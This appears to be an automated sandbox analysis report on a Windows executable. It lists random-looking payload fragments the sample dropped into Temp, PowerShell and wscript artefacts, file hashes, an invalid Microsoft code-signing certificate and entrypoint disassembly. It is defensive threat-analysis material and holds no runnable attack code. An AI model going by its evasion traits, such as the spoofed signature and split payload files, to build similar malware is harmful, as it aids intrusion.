dMPBhsn85nCogqfWZO0hhDrRQ

C:\Users\user\AppData\Local\Temp\gacittled.re

Download File

Process:	C:\Users\user\Desktop\YyVnwn8Zst.exe
File Type:	ASCII text, with very long lines (5774), with CRLF line terminators
Category:	dropped
Size (bytes):	7747
Entropy (8bit):	5.951485683206874
Encrypted:	false
SSDEEP:	192:PGi212VX8BOChxx5lhMllZsKvQ8WE6F1VxLR9wn:PGi2eX8ECT7MllZskQ8EF7/i
MD5:	7F8B6C929CEA9B45A73A4CB6F4AD030A
SHA1:	3D32CF65FA7B26BCFDBE85892CC5F384C21C63DB
SHA-256:	A436CC567334682957EED5FC80E8E4575BE169C58032458DAD97A7FD6D7DEAB6
SHA-512:	1B47F6FB62146A97A4D816EEF6C397E018D7EF12913E6802FAC9854C9BD966D6C247D0A60B953010DD730604EB230E7F166143354463A901A26A55BC7CE52A00
Malicious:	false
Preview:	0TKDXRYDWMtyZ9InjhsCv5c7xYmuyF0KxyL9Y3IHFnfYMFR9EBcS3y1hDYJjWRPBJWjd2OE0Cb70qCwFKFlecQILDMwZyH1gBTE2HGZgphb9ugxjlEaXsxjSOOi1oEbwDSNlIQGeAwOuJTQKb4naRTJuc0Wy7MTambbF75DuzdCcWl1Zatkg0yW3sOEUbp6FWEiYKxeamJeM0a8Jl4BoEHPooG1E1mAMEHTz1bqQ5uirz9ezt3JhSYx4VYGW6SH75j49sC09toUYlymTMzVgYhkHzaI170KZpWtx4IrmJWQdnY5ycvH3SLW1wviweWCU5dNg9fNnzAe6O6YvYjSPM6KN4oO1SVE53clmu1g1WXyeZNwZe7MK0hCuw4jKvpBCsUwk2uElvcQC4fYdFNlpcHB8FdcsUix3ZLMQz1Wy4pzv35f43XQDzcAtycnMfDFtab9PiAWyUuKvRVFxDpc0ze4bwxCma15DNmJIk50AUTdB99J6Wn43ZMvwgIG1mpi2sp1ZS1QAUhOzhyoNe1CWauh0GL8N6UbyOmpKcds631TJPB1Je4ZCsUatgHb7pBPozUHZFlUDWwEzLGXVQfLzF8IqGtslXQu9QfaeYgnZvSwJ0vuDlZG8lWhlQJQefSpVy3mTXSMaNExC2CXwNcDaaXULq1bbNZHirgnSlzpoy94YB6qomV8PovjBSQoSeCzYeiwqylDXI6kZbY7vuO9Pzi5E4SXz3GLa0frf2yubdE0ebaK5pXjhAslGYzzqRY0gYzZdPQJSzTH85jlz5BMbcBkGFrrILiWQEZMUigQ1PHiCoKt9Cm40FIyjfzzTU5KpeVEKHTpbYiK3xrBQytfVF5vXsAPsFJ6NJ2Mjvo8UUCJNwBpQzeoPKiPYQadMDddqzurK9Phc5p9coAiUcv0zJklUFhCvWfGc0YCj0BptqWd5rmCCrbxPtmynvgG7YQZYShS4T8a1pbwjL4qdUI3xFGjDMLItGaDDBZabepO3

C:\Users\user\AppData\Local\Temp\loffin.sot

Download File

Process:	C:\Users\user\Desktop\YyVnwn8Zst.exe
File Type:	ASCII text, with very long lines (6510), with CRLF line terminators
Category:	dropped
Size (bytes):	6816
Entropy (8bit):	5.948252102815221
Encrypted:	false
SSDEEP:	96:JM+9Bbj0UskQyR89Kw9HYrlNlI2Fb2rFJEHa5t9UTf9Goxny1XLFF/g1e05CfZqU:3VxLR9wD8bqx58FI54wjPpz
MD5:	47B1C1B01BC866C7DCECC2F283AB3396
SHA1:	72578E3ADFA3119BFFAE602A5DF951E9A09D97E2
SHA-256:	BEF60C4F17B8A8EE3D5AD732F43104D2F4C3A3045FB437F703B99705D3B3AF55
SHA-512:	F18EB25DA12CE2BF54000BDE76359ACDAE6D7F43C3E376ECC8AEBC8CB1181EF419DB1A44BC49B23452D05B08C85AA112A4B94E0E3201DB90603B9832E8CF4E1C
Malicious:	false
Preview:	ogdnW0PpCNzJAmlciGJEJC9staq6tp4DLvwGIKOIGRRoehoKRdzKmgNZiHScAFe7ulNJIRKCkOHY8PYvll3Ly6RkAfmlxhX6H7NWiM47c0wHqA4X8TWSDevi2mmvpWNUCmGOOKWjcphrREcpa4yVOR5l92lkVMOmZQJcUo5ivuQr6VxnkS0sqb2ipuz3gVpr6N0r1ju47MlTxSSTzCWAxieZnOMw9rASagEUhH0inlmGhZnUbByGbhrLBmAi7HgnfjbsIpA6wAuVzwL2NyrB1hLmlA70NGnZYL6WEVslpa5lWYNv..oJZJNskamMBc60hytXlVq6kcUg41mXeA2liQNY433cdAvSwSGjt8YnQ98FZS7EPw5YXSe57NmPXK8bPXrLyqZgMaRGrb9uam37IaOveEOFROfE5ehlkwyL56qhMOEmgQC13iH6ZMidwtVPh839Pwcaz3hjna5rVd8SJXN0kjdFRjwo5dyVtfokdD8CSspHK3gU6i2EoUZTHVLyqVT72B1dkRFHEFPGishXsUnuuvQl1woC3x3UhIrMbBA666ItMtz8uCFy5ZWHw4lljqmjnRnl9F1B8qzKQ2yOeCvtLb4SzFDVbSyRTlYdGMHa6ygyDBqPG12XhM52NAuwZF2cj2MrliobLpIwAN4171dF5Oo8c04av5cfFH0xoVUl9lHK0m9JdrRIUxXjInKTaLSZcMGOVurofxPGfqqxvqsYvElFIzf3s7E8MmdW01eSH9iOYPZBVzcG8VwRmDAnQFq5Mst25sjx3cSgsUiMYjpqpdU5KHzcJ61tI4al6Gb57zIVLZ5l9O5KuyV6ESrs7bcByKYNFq7ufLvbJLqQzoPDcNlJhspUySjSxKbylfqwvZooiqa4wuq1LgnCk5GZF2lO1c6AtaKWhrSQGLz9ClMBaHUqx6kOqgDotHC4bWLN9wQb7dB73Qzeyi9m9AqTkIFeOSRnFFXHiGX9fvtqHJU1pQQxJQoZF93mvVjk

C:\Users\user\AppData\Local\Temp\nitryporm.ly

Download File

Process:	C:\Users\user\Desktop\YyVnwn8Zst.exe
File Type:	ASCII text, with very long lines (5531), with no line terminators
Category:	dropped
Size (bytes):	5531
Entropy (8bit):	5.945180561843975
Encrypted:	false
SSDEEP:	96:8pvnmMsnKAjB/7pCVr1NtwY6BU8LquF34vaFznoGij0VT123lsahaBOdc4:ymBKAjBzkVryY6BUVraFsGi212VX8BOr
MD5:	93E39C7275A7377FF837992141789593
SHA1:	40E0D90A868166CD36C896B6BE389ACBFA8A1CDC
SHA-256:	B61900A4208A9AED35DCDD706FBF0BAB417ABFEAEF6AA1C8FCA7F68575A14EF2
SHA-512:	29CA6EB7289392DE0259C7CE417F8F3BD99A59815ECDE2358C4D70C53D0DE4FF37666BFE162F0937DA6D8B5C6F7A3CD32AF29564363FC8810BF09DC1DE4F3CA3
Malicious:	false
Preview:	rIJ9uGpfdxO2wKVsCFp1pab51Yz0sZ5DpFCBWj5zSRFWtcRuPwCPYUQED1AQjz5pRTbztexh60GpN2UF8AMGv0owV7SRHcazYTc7FWn10Wd2I8ct2ZTNVurvE3ivYR0bwuFnyZSjeMrZh1ztOAcmmMajwAP0Nw1k6mqDfIPeRlDGcQvA1G4DTbhnf2ioo6oea3ZAcfYTE0wxwvmLEjufj5IgZGiqKVckSJ9o7q6HjJW4YbXpdYElTEIzPOXTQA05gNiSflziSdj7N3GWTlRaz4i3ZBxEMqje9g5s2FgJoI3qpLLfP5dElRVpTcCZBMCaCHPgpbOQkO1XRSKktjElfNFsy8I3QTcPGkVuVnvsmAsOcwlb7oj1O76iTAWHGtpJWhlK4zP18sII1h6ndkBXmVzmiHUM9C1kSjEXVAtMCJ1ygf2uv9WeEregdiSDuqNDIktkMgbVmFDGLm1DStTYA1P7w89T2X9yYPkkQvEA0aNUjySi0t8A5DYkqt8ujassRoOBMVgfRDOIJGHdW4XRR6hedbueCrjyxMbNrqwleN5zuYKDiol7FFLoLg670SudJQxTxFW131SE3VnCIeYXOl8Ubbe6YaRW1epHw5iQdFH32cq2P3NkdduE3p8LhPnFJqQgp2yJfIVnCXI1DGBvtEqwvALnOY9HwEgnL551ScVjEuysWPALCkEu06SRRRzwk0B9VlDDjrYkx7zZuxxVW8HAQBj8agNL25LN15BfsHLtmUsSC8dlZBALTFsD5qMTVrZ25lnOUqbnTjBk74J8Nvjw9Me0JNOcQCKC88LCT4OiZSUGNBtgbwU9MFRW2BpLexBnONEQNnL5ieJUDnGIiHqMZfT12QRQVSCbsqMF7cnIBDOTskM3VO78YfFut574eLrP44ocKhnVaj0pAzT9YmfGg4PdqgJM8XbqWdzrKmminlmYaiNS2D3tqTEFadNbASXrHuSquTPfid7q4bmwOFiFlzkzGhEG9es3Yc0a

C:\Users\user\AppData\Local\Temp\nsdothry.nti

Download File

Process:	C:\Users\user\Desktop\YyVnwn8Zst.exe
File Type:	ASCII text, with very long lines (3413), with no line terminators
Category:	dropped
Size (bytes):	3413
Entropy (8bit):	5.937042200342785
Encrypted:	false
SSDEEP:	96:8JEHa5t9UTf9Goxny1XLFF/g1e05CfZqu:8x58FI54wn
MD5:	FF13C0E958D09C467B594D61706BE4E7
SHA1:	F27768B2685FCD5CA2AB7F880BBF502871ED37BA
SHA-256:	20612C0E26B5A25EFC22CCB5B44E4F1B7DD152A846073D1881D3C04089039907
SHA-512:	0E8D22BD75B69FF54554C801E4F65F4DB96873DB1C7E1B81CA78AE349839A3A4F08138F6811F0D3DA2841053A1EBC160308D5757E68B6C9C3F8E8393364DFC99
Malicious:	false
Preview:	F73HvmmoBEr0S9sEoKhzt6oSqjII2VS2TnhrLA36uymqI1r1impXlzuAEawGiV58qSDmUW6etIYppltK7JyhYn34C9FnDDQCBdsSjXTZVa4rgyuAkGt5VL3Ne5l9vMNlQPelmYBLxITkoDkkUPhMBvYvfMq6YtaUcIpWEiybLrdkSRJF7oEuxsYsxygySpcZtSnUIpzOO0Xukk62P9R9G2XWPLEnqMYFr8ZLyyakNrHjzYpzQ1TvbnjH77L6cOoE0RYs3lTnue27VAB3uzH6F9cF16SyQb1Wr359aff2Xj4GjueqQkx15mbwRiVS0PdGsFEc5m8Am4djNMHqXB1Qb5ieP2V1vUkuVeY6ICslzcVcEMUGeRaQcw1UEuWSW4wxTgWkTT0NKa1WJB0lIUOSOxlWJPP764FscSl1kwhrzvWplBTQgNHts8aAqC6hx8koNEozdJcnovAEhVa8usIwHtkrbNmioDX7g1pCaeSZxZTLGAdjbP67QSoaMoEpUG65rp3m0evSV65mOqYRyqksWjOyIlGQM14JoW8L9oL9LMhf3m7hEWuhqVYBtGcRC8KBOEssE9OVnLncZhuxirTe1m3M709G9fP1JUJznELXiWRayPmS0JE66xM2q9Zwf2wPc86u5gjLFHMdm7lgSG0Y21AjbhNIwW7p53duvipBBZqcJPFXEGwidYxBmwke7QVloc6dAl3CYgS58prXOdkhJ2uYmS1e7FH4q7A6kYwKCGKJhFOhI4xM82YVWKKe8pENhqsi6oiB7lkjFJRApVUlEU1T5OYFMkRI34PFE2s0RFDwimU7dgW2y51tWExjNwNg8IxLM5aRhw4GQzpgZN9jvVC1QtNpUhbHuPTltaZosyUF9KEYDXhJO8deD79b1SaXVMl2P6R7iQNTr6Dl5njY4vRmMyFfJdRsd32UGBhFWNZ2Vl2Qa1ValXO0jIKXWVPwpEl5TdDpqagc4fgi9bobfKVEFToO81clogrQ2Dih

C:\Users\user\AppData\Local\Temp\nslisfil.yli

Download File

Process:	C:\Users\user\Desktop\YyVnwn8Zst.exe
File Type:	ASCII text, with very long lines (8957), with CRLF line terminators
Category:	dropped
Size (bytes):	10818
Entropy (8bit):	5.950179627818609
Encrypted:	false
SSDEEP:	192:OsKvQ8WE6F1VxLR9wD8bqx58FI54wjPpETrU1sRhR1BFF:OskQ8EF7/88nFI54DT4ibbj
MD5:	2E85E26F1BCF5F1672A53DAF39F2A168
SHA1:	61E4AC99D32B5B8207584EBF87C70B6D9B4CC902
SHA-256:	DE0F099A6F7BDE71538999345E8FD460FF173EFDD0E521024700A13253A1A706
SHA-512:	CB7982CE7CFE1896357561A651316A4F6ABB10DC72C48512A6BC450173F8252A5E4B7076B99D54E3171DEA808F84CD11815530904CF61504B5B844E474E4B4E8
Malicious:	false
Preview:	UgWxHI46E1FkzLaI2usJpLN8JpsqHrUQcxaESPKNrb147AI2J4iU31djg7DPinJsyDox5er2qkWEDbdTZrKLuygPqz1vViVqkOPbw5peVDbxKppqdjoA3WNBxUUWiDBot3PZ0WgSlSkLSSzer1XW1islcpD9xFBcEBvfRnpCwboNx1B6p2mmvekZgxI2fSVXPVilHHrTdrTbKb0dNL6UuY2136T0FfCqfCN08hZLL8hXq4eeNqsM0GZJgghkIJhfeSRD9WAf1tGRr9vvXuuhBFE3vyGAKIpCwleNQch6sRS2cgPtYtB9REzFzNYq6z0xr1CEfQEsgaLmtBsOGZQGch7IraD5pAv6XQLOLiHPjM0ydEiubpo3qkQnScxLFZJNx0zt5p8REjWEoREZpRQXfl0zJxSoTpy6JQvNenSy8IMURyhQwHBZbzm21dBNqfxmeURQWxokoaKhUF1ha3Z2V5eNHFo6FloCr3ygOATovSeijM2VRmM6hRXwJdf8ffPuznSF7iJV0x24dNENVWR5pTdvE99UWASIxnwoKZnI8dJz8AAD20Q5S4ydrlGepaKDe96kP9KmA5JoeZxqjIuzf9KFdRXzj2XpgVfa9LokjVsJENXltzmcIk9O1PVFgRWLylIzWBDMYhcwfKOtzwzQOdRy3iqCvSDOiM1usrI7oifBY5gvr30phI0sQ2MO0lvQ3a7Sr8Lm3sKDCAJRyvUObPZ1Zc7iXsdtqRrAGW9RH0RsoAwPeFKJ6ckYdiRW33Lr9YoWTqFmNIUCZEqPrTSpFzIW4ETKLWbMP2C1YtAXSrsWtMMyfOFuJL6SYPh1uabVwKaaB3F8BHLtLGeIXskOVBKWEAM7OYclm7oUvhz21eHSfXKRZV2F482vZVqpR8InmJhO0MhPK4q66ftpCWNXavD6HxZVV4VLugQ8vuUIWV9BGaZmvovYJeQI6FcC8It5TCeBZFHvPouqzrZiFwFVTbZLTh6VGCcU9rEaWqcj

C:\Users\user\AppData\Local\Temp\rtwir.cu

Download File

Process:	C:\Users\user\Desktop\YyVnwn8Zst.exe
File Type:	ASCII text, with very long lines (8361), with no line terminators
Category:	dropped
Size (bytes):	8361
Entropy (8bit):	5.947873352000082
Encrypted:	false
SSDEEP:	192:TmBKAjBzkVryY6BUVraFsGi212VX8BOChxx5lhMllZsKvQ8A:Tm0AJkVryOaFsGi2eX8ECT7MllZskQ8A
MD5:	782DC802D8EFD2B75BEF589A20C94024
SHA1:	5FE4EC6BDBD579068831A822E86670E2160D2147
SHA-256:	E80DC7946E566DDC3F84E10E83D276CC69CC8FF7040BD0CD8E99C8F8306CFB8F
SHA-512:	3A5019AA4CCC5475EE55B680C2222546C16697A012CCA0A32D71913A633EAC718952654B894CEBEC4CE64A2F52EC6236D7E49D21B81DC5786DDC54A20F5E4366
Malicious:	false
Preview:	670SudJQxTxFW131SE3VnCIeYXOl8Ubbe6YaRW1epHw5iQdFH32cq2P3NkdduE3p8LhPnFJqQgp2yJfIVnCXI1DGBvtEqwvALnOY9HwEgnL551ScVjEuysWPALCkEu06SRRRzwk0B9VlDDjrYkx7zZuxxVW8HAQBj8agNL25LN15BfsHLtmUsSC8dlZBALTFsD5qMTVrZ25lnOUqbnTjBk74J8Nvjw9Me0JNOcQCKC88LCT4OiZSUGNBtgbwU9MFRW2BpLexBnONEQNnL5ieJUDnGIiHqMZfT12QRQVSCbsqMF7cnIBDOTskM3VO78YfFut574eLrP44ocKhnVaj0pAzT9YmfGg4PdqgJM8XbqWdzrKmminlmYaiNS2D3tqTEFadNbASXrHuSquTPfid7q4bmwOFiFlzkzGhEG9es3Yc0aXecBNAIGC9TMVo4vyJnTncT3OJYoh8tWHEVhlufRm4QuVXv0yXDV0s2VBTsB21VZmW75cuqL4s0W9s5tmvi5eaKZpUZzXVLOxyecMclbsZjBLgRmswIgIhUWFZsTgkKmGlgu9oVCKYewZhFxIpLk9OK9pfOnHrIgoETiG11cOAnNJtvuarkAvlqL4y6tm2FZxhtKRzmy65Q9WKHfC4CTiDEVbuMDFVCmcHubLv27O8r3leuKK5e4hCN83h4kTZM8GFt3LYUoZAq6g5yLQTqUcJw18m42GlLgrMuiFjNUyVEnFR4xMTGTdElX5bEXEdPNCz0kTIn1Cc7Vyes1YZbw5EYa1QArPN8D6s7glgo7WIipvFBymEFjakylaIwejH1EJNl0vwAAZvzYY51z3OoEKMVup0LdovYNH4JQJKVKJHx8Uoc5WSXU9QllFBZGMhnTo37bmB10C0NCgIPJnhKiuvUn7EvphREUFbDVqf9QBPnTYlQVrO9MrLgmydPxK2LjyuO6NhmWvi7o8wZKTwgl9rAdpZnpV34dL07iyBdlhKIy2OlwskExVvVe0n

C:\Users\user\AppData\Local\Temp\stnestsh.opl

Download File

Process:	C:\Users\user\Desktop\YyVnwn8Zst.exe
File Type:	ASCII text, with very long lines (6213), with no line terminators
Category:	dropped
Size (bytes):	6213
Entropy (8bit):	5.946115410737298
Encrypted:	false
SSDEEP:	96:3oxny1XLFF/g1e05CfZqcr4kpwlT4mU1sKPchRXUIBS5R4OClTSnHdZ7Vtl:YI54wjPpETrU1sRhR1BFOClTSnHdZV
MD5:	5812E9A2BFDC59A34A6B5AEB7A2FDB3A
SHA1:	42706BF6F6BCFAC6C3B25057A86A7385FB393720
SHA-256:	09C18ECB453E89A205CC6E5E5032A85139A2A034C1B39A85BE7BA23E147E4BB8
SHA-512:	F720C6FEA8B9B2BBD7B45896A76CB3689A3B9975513E57149F6A6B02FDE79A6178ECD8663F47C528BADFDA2A3797F110FBCB18E2776976A920F2C0EC2E43568C
Malicious:	false
Preview:	t1KGAmez1lznTWppQPNWMC1eOobyy2OzKFqCyN8eKHg4W6ICFibXe8Mp7Jc688QYi6uEObg5t9ZkvKAwHoFHq4ROfbJY0Kpa73nGDMTQMOcGSkD6wVPhlP262aRxJ6kghEGWsmUQ3jT9DboCALtlbztWUcVZ2xYyRQJq5V4BC1ptOX9REs0W5JMLx2RElkBL8pkWlKShhgrQ0LQBqKA0c6W8mzaPR0A3aukgUe5aQrsr6UtPZSAwGndDo1JwexbeTlx1o1o1bVGgQtnWPhICkqIFWA6BoM840JhdG00M5gjKoAEXtLnd2mEU1LWUYRpo3O1qQtwR9DoouPSSwWeeNW6v7Ik0i0g5VaDcq5FM6KdVnI0KG1JbVpMaUZ5J7SIEEgWmEY3GzYa2gl0wLPnwgHgD7bdQXueTrLsBB4enDr9bFUnHv1GwcjcEdaK5JmOPR3HPD6qQq57izwRNq918Ex0xV41b5vnGBdOHrVovdHU3JO30CunwfW9kEkLGBM7Jmu8kJovkOETFtdfgDT232HdaGDZfns4ikZdWcPGv1zHmjoLYPNK2ZXgP0FEKFif1VWr9ynLLRlhPN4cT0sG0BycwI1EyrgTYDNEmd5EyXqlM69VGEwScJIB3rXeZzog8LgbBqrCSPzk48gb9QjEv5XRunI8vUvZtuTCohSzlKmF6kh9QLDAkC1qZriBjNEbba8Ld1Z4rASbu6SWdgUYFwMHFMZaboZoEPZfmQJ4yVLN9ODCXHBsSvDTNDWin3wvKoA54p1Qf6K8IOxYLhbgYgiszQmcJAl4zgl1u3mzjqhdMbTeoYEMMcOw3AZIxu57dU8Ug00SjBUR3yhvp6yLIT6Y5uP8J7mZXDpxEBaOZUJUAsLOSvLOEVxuEIpfYndIZvtLnHHTSn8vTSKTDH3I2Sp1KsP89BTGbMtE0hDoVK5LIiCfhfWBh2dUncbrIPSH917OQZhUtLtgyVVIw4AvdG3P6D286GJC0MuMKsc0s

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WA4QG6JGO7O53YR7AYY8.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7214618438248155
Encrypted:	false
SSDEEP:	96:Fufv3CET9kvhkvCCtMe1WZL6HZi8e1WZL6HZiO:FufvNMeYZLeeYZLY
MD5:	D7E9358866DCDE0B95D4474108ADCBFE
SHA1:	71F219F83787A2E88B1FFDB45DA70C8652AD77D6
SHA-256:	EC96B8F200FE08724DCCAC405D37611974DBBFE5AD066F332995FA2838662108
SHA-512:	910E33D2A03099E5532C22BE0823EC6A952A1233AE11BD8BF17A71FAE3FF6CD1B12AE695E03842BB39106C3D6020EEC468982798D829703C21FB31D5A0B23D75
Malicious:	false
Preview:	...................................FL..................F.".. ...J.S.....}.T...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....$P(.a...d.,.a......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2(Z.u...........................^.A.p.p.D.a.t.a...B.V.1.....(Z.u..Roaming.@......EW<2(Z.u..../.....................g.M.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2(Z.u....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2(Z.u....2.....................j...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2(Z.u....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2(Z.u....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2EWk3....u...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7214618438248155
Encrypted:	false
SSDEEP:	96:Fufv3CET9kvhkvCCtMe1WZL6HZi8e1WZL6HZiO:FufvNMeYZLeeYZLY
MD5:	D7E9358866DCDE0B95D4474108ADCBFE
SHA1:	71F219F83787A2E88B1FFDB45DA70C8652AD77D6
SHA-256:	EC96B8F200FE08724DCCAC405D37611974DBBFE5AD066F332995FA2838662108
SHA-512:	910E33D2A03099E5532C22BE0823EC6A952A1233AE11BD8BF17A71FAE3FF6CD1B12AE695E03842BB39106C3D6020EEC468982798D829703C21FB31D5A0B23D75
Malicious:	false
Preview:	...................................FL..................F.".. ...J.S.....}.T...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....$P(.a...d.,.a......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2(Z.u...........................^.A.p.p.D.a.t.a...B.V.1.....(Z.u..Roaming.@......EW<2(Z.u..../.....................g.M.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2(Z.u....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2(Z.u....2.....................j...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2(Z.u....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2(Z.u....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2EWk3....u...........

C:\Users\user\Desktop\31f576c

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	373760
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	89AEEB581C5352A5F1621E1A7179E2D4
SHA1:	30B374B8F8FB8D0A0D10ECB5A4A7F9F5339E1A0C
SHA-256:	2D27057F415E630DF101E9315CDF4BD73CBBC25E41C0C81EC5FD584448BB8379
SHA-512:	85E6E5A0CAEE7B238AEC23CE5C54F7A05D2E42D45BB0738414D60318ACDC9D36FA906A2A0E8E68D055F3968706860BA09DC2C348E0D34BDBA19F2C6FD4BDF8FD
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.0088223848931746
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	YyVnwn8Zst.exe
File size:	372'700 bytes
MD5:	6cbe4dde104084454980ae3405a0339c
SHA1:	bf2cc3af5ce453f099d8321c5798ad0de7e9ef67
SHA256:	880a3b6203fef131d20346d1258ae22031c3d84d8a35d01c8f4b7fe3729c0d0c
SHA512:	e0e1a0cda39117f4c817037ea879669b44168058f9b06cdb73dda81bcc7546778d3b3e579a517b8637578044911c155945e2ad977529c7db12a11a56b6bf63ac
SSDEEP:	6144:GOYGXaPNxdgSdcq2pVZPOJHAbKItVOCWQf1Tw9iQgMUJ:iGqN/XdctpVtk4tV2Qf1U9iQNUJ
TLSH:	6484C042F6C2C8B2E9731931593AAB116D3DBD201F349A1FB3E4796EDE711806235B63
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	2764a3aaaeb7bdaf

Static PE Info

General

Entrypoint:	0x41e239
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5DE8B3B3 [Thu Dec 5 07:37:23 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	21/02/2011 21:53:12 21/05/2012 22:53:12
Subject Chain	CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	B5F17D844A8EC60225F8308A7D546D61
Thumbprint SHA-1:	93859EBF98AFDEB488CCFA263899640E81BC49F1
Thumbprint SHA-256:	F3A7C8CDD6B19E05C43F9E76F63247A51B655BBD58EF52475151BCB651136E9F
Serial:	6101B29B000000000015

Entrypoint Preview

Instruction
call 00007F8F288675CFh
jmp 00007F8F28867003h
cmp ecx, dword ptr [0043D668h]
jne 00007F8F28867175h
ret
jmp 00007F8F28867746h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00433068h
mov dword ptr [ecx], 00434284h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F8F2885A56Ah
mov dword ptr [esi], 00434290h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00434298h
mov dword ptr [ecx], 00434290h
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F8F2886711Ch
push 0043A4D8h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F8F28869A04h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F8F28867132h
push 0043A70Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F8F288699E7h
int3
jmp 00007F8F2886BA45h
jmp dword ptr [00432260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421480h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3b610	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3b644	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x12e9b	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x59884	0x1758	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x75000	0x212c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x397d0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x34218	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x32000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3abb4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
